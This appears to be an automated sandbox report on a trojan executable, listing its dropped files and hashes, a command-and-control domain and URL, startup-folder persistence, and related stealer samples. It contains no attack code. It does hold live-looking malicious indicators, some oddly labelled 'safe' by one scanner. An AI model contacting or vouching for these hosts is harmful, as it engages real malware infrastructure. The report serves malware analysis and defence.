DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
9mauyKC3JW.exe	29%	Virustotal		Browse
9mauyKC3JW.exe	42%	ReversingLabs	Win32.Trojan.Nekark

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\yhg	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\cvnmq	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\hv.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\iepdf32.dll	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Chromewizard\iepdf32.dll	39%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://digoperonodice3.online:443/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4i	0%	Avira URL Cloud	safe
https://www.handyviewer.com/openSV	0%	Avira URL Cloud	safe
https://digoperonodice3.online/Ohio-Vall9~	0%	Avira URL Cloud	safe
https://www.handyviewer.com/donate.htmlopenS	0%	Avira URL Cloud	safe
https://digoperonodice3.online/L	0%	Avira URL Cloud	safe
https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D	0%	Avira URL Cloud	safe
https://www.handyviewer.com/openhM	0%	Avira URL Cloud	safe
https://www.handyviewer.com/openhME	0%	Avira URL Cloud	safe
https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay	0%	Avira URL Cloud	safe
https://www.handyviewer.com/contact.htmlopenSV	0%	Avira URL Cloud	safe
https://www.handyviewer.com/donate.htmlopen	0%	Avira URL Cloud	safe
https://digoperonodice3.online/	0%	Avira URL Cloud	safe
https://digoperonodice3.online:443	0%	Avira URL Cloud	safe
https://www.handyviewer.com	0%	Avira URL Cloud	safe
https://www.handyviewer.com/openS	0%	Avira URL Cloud	safe
https://www.handyviewer.com/manual/openU	0%	Avira URL Cloud	safe
https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=	0%	Avira URL Cloud	safe
https://www.handyviewer.com/check-version.php?version=openS	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
digoperonodice3.online	172.67.153.243	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.vmware.com/0	hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History	Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	false		high
http://ocsp.sectigo.com0	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	false		high
https://digoperonodice3.online:443/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4i	Localdockerv3.exe, 00000008.00000003.2112186023.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2159559087.0000000000528000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000014.00000003.2200733958.00000000004B4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.com/?Freeware/Find.Same.Images.OK	Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	false		high
https://www.handyviewer.com/openhME	hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
https://www.handyviewer.com/donate.htmlopenS	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://www.handyviewer.com/openhM	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000003.00000000.1464088467.00000000006F3000.00000020.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.handyviewer.com/openSV	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	false		high
https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay	Localdockerv3.exe, 00000008.00000002.2160661904.0000000000AD3000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de/?Freeware/Find.Same.Images.OK	Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	false		high
https://digoperonodice3.online/Ohio-Vall9~	Localdockerv3.exe, 00000008.00000003.1897374947.0000000000528000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1897886861.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1916979579.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.handyviewer.com/contact.htmlopenSV	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://digoperonodice3.online/L	Localdockerv3.exe, 00000008.00000003.2112620225.0000000000588000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0	Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	false		high
https://www.handyviewer.com/donate.htmlopen	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000006F3000.00000020.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de	hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401E0000.00000002.00000001.01000000.0000000D.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History	Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	false		high
http://www.softwareok.com/?Download=Find.Same.Images.OK	Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	false		high
https://digoperonodice3.online/	Localdockerv3.exe, 00000008.00000002.2160225088.00000000004EF000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2112620225.0000000000588000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.0000000000588000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	false		high
https://digoperonodice3.online:443	Localdockerv3.exe, 00000008.00000002.2169892760.0000000007F50000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.de/?Download=Find.Same.Images.OK	Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	false		high
http://www.vmware.com/0/	hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	false		high
https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=	Localdockerv3.exe, 00000008.00000003.2091618343.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.0000000000588000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2112620225.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000014.00000003.2200733958.00000000004B4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0	Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	false		high
http://www.???.xx/?search=%s	hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401E0000.00000002.00000001.01000000.0000000D.sdmp	false		high
https://www.ecosia.org/newtab/	Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.info-zip.org/	hv.exe, 00000002.00000002.1486704045.000000000C77A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.00000000054DB000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.00000000027BB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.handyviewer.com/manual/openU	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://www.handyviewer.com/openS	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://www.handyviewer.com/check-version.php?version=openS	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://www.handyviewer.com	9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1450461576.0000000001546000.00000002.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://www.surfok.de/	Localdockerv3.exe, 00000008.00000000.1734434382.0000000140156000.00000002.00000001.01000000.0000000D.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.com	hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401E0000.00000002.00000001.01000000.0000000D.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.153.243	digoperonodice3.online	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581191
Start date and time:	2024-12-27 08:14:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9mauyKC3JW.exe renamed because original name is a hash value
Original Sample Name:	ae130c89b7d8c4c9fd06422faeb79fc9.exe
Detection:	MAL
Classification:	mal100.spyw.expl.evad.winEXE@20/23@1/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 53% Number of executed functions: 42 Number of non-executed functions: 98
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Localdockerv3.exe, PID 1296 because there are no executed function
Execution Graph export aborted for target hv.exe, PID 1612 because there are no executed function
Execution Graph export aborted for target hv.exe, PID 3324 because there are no executed function
Execution Graph export aborted for target hv.exe, PID 7960 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:15:40	API Interceptor	3x Sleep call for process: cmd.exe modified
02:15:42	API Interceptor	24x Sleep call for process: Localdockerv3.exe modified
08:15:29	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bstask_x64.lnk

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	uUtgy7BbF1.exe	Get hash	malicious	LummaC	Browse	104.21.71.155
	x4PaiRVIyM.exe	Get hash	malicious	LummaC	Browse	172.67.175.134
	3vLKNycnrz.exe	Get hash	malicious	LummaC	Browse	104.21.62.151
	installer.bat	Get hash	malicious	Vidar	Browse	172.64.41.3
	skript.bat	Get hash	malicious	Vidar	Browse	162.159.61.3
	din.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	lem.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	markiz.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	utkin.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	0Gs0WEGB1E.dll	Get hash	malicious	Unknown	Browse	104.21.22.88

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	uUtgy7BbF1.exe	Get hash	malicious	LummaC	Browse	172.67.153.243
	x4PaiRVIyM.exe	Get hash	malicious	LummaC	Browse	172.67.153.243
	3vLKNycnrz.exe	Get hash	malicious	LummaC	Browse	172.67.153.243
	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	172.67.153.243
	NewI Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	172.67.153.243
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.153.243
	exlauncher-unpadded.exe	Get hash	malicious	LummaC	Browse	172.67.153.243
	atw3.dll	Get hash	malicious	Gozi, Ursnif	Browse	172.67.153.243
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse	172.67.153.243
	0zBsv1tnt4.exe	Get hash	malicious	LummaC	Browse	172.67.153.243

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	ATLEQQXO.exe	Get hash	malicious	Unknown	Browse
	ATLEQQXO.exe	Get hash	malicious	Unknown	Browse
	upgrade.hta	Get hash	malicious	DarkVision Rat	Browse
	MiJZ3z4t5K.exe	Get hash	malicious	Unknown	Browse
	UolJwovI8c.exe	Get hash	malicious	Unknown	Browse
	ONHQNHFT.msi	Get hash	malicious	Unknown	Browse
	es.hta	Get hash	malicious	Unknown	Browse
	BkTwXj17DH.exe	Get hash	malicious	Unknown	Browse
	TVr2Z822J3.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\7793cd6f

Download File

Process:	C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
File Type:	data
Category:	dropped
Size (bytes):	5685791
Entropy (8bit):	7.735296092306856
Encrypted:	false
SSDEEP:	98304:fRvTCmITyYdLBTEMwsJDvIdYzQMvCOsG/cbLxf1e:JbdaVTEGcwqO10bLy
MD5:	E3ECD9A2BF9E44E13947243CA501197B
SHA1:	394138DBC559F794B6FB79E6B3CF78D015EB9920
SHA-256:	52A3FD13CE124C07926A84F0D3F73CEDF4F11BD20A2672CC7EAEB2131F7CBD3D
SHA-512:	E2608B2784D0B3209DEDA7EFF902B6C436731E1B802F7A99F43C3B0DE94FF82D6CE6B5F2CBC8E10774869F35E282E8325ECCE510D94E2157CB93C60466CD0098
Malicious:	false
Preview:	[..Y..X..X..Y..\|..L...X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..}k.T.k.E}v.m;X.w7L.X.C.`7].X.^.v,..a6_.TE.v9G.X.^.v,_..X..X..X..X..X..X..X..X..X..X..X...E.j1^.e4C.a.R..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X...E.v=K.a.D.p9D.aX..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..}}.J.c.!.g.gE.k>^.J.~.BK.a/E.oX..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X.....4v..3j...X..X..X..X..X..X..X..X..X..X*..

C:\Users\user\AppData\Local\Temp\8834ed0d

Download File

Process:	C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
File Type:	data
Category:	dropped
Size (bytes):	5685791
Entropy (8bit):	7.735296057845514
Encrypted:	false
SSDEEP:	98304:qRvTCmITyYdLBTEMwsJDvIdYzQMvCOsG/cbLxf1e:IbdaVTEGcwqO10bLy
MD5:	D0E390AC18F930C652A4FCC2A45C9CA4
SHA1:	7A8DB921C74A384E09FE7C609FF6521108BEE057
SHA-256:	77A469B75D58B5875FB3F207B28558579C9C9E7A3818E01280B890F32D07FF2E
SHA-512:	4E28B50F7788EC2720FAF84E6A024FE13DFBB10F26E2FCE74662F898C3FA2C29191E651266BE1965E1E55395CE47FBDBC4C01CBD879743EE3911EE2F0A488D09
Malicious:	false
Preview:	[..Y..X..X..Y..\|..L...X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..}k.T.k.E}v.m;X.w7L.X.C.`7].X.^.v,..a6_.TE.v9G.X.^.v,_..X..X..X..X..X..X..X..X..X..X..X...E.j1^.e4C.a.R..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X...E.v=K.a.D.p9D.aX..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..}}.J.c.!.g.gE.k>^.J.~.BK.a/E.oX..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X.....4v..3j...X..X..X..X..X..X..X..X..X..X*..

C:\Users\user\AppData\Local\Temp\8f36b088

Download File

Process:	C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
File Type:	data
Category:	dropped
Size (bytes):	5685791
Entropy (8bit):	7.735295496320632
Encrypted:	false
SSDEEP:	98304:6RvTCmITyYdLBTEMwsJDvIdYzQMvCOsG/cbLxf1e:4bdaVTEGcwqO10bLy
MD5:	0DE35E59AFD8E5578F4290FC54FE4BD6
SHA1:	44234146F2061D1FB5711188B8BCD02F155F3B71
SHA-256:	52D6AD21096DAB1F17D3BED3DEC1C201CA9D83183A017E2B310AE3059BE3DCF0
SHA-512:	C87B5CA312E1BFA206453A8CB436D0AD24099766FC0024592E8BF154BCD30E4902D041FCC604CDE211B677FF4F5AD946B4E9BA4C21A5E18963ABF54D46A68958
Malicious:	false
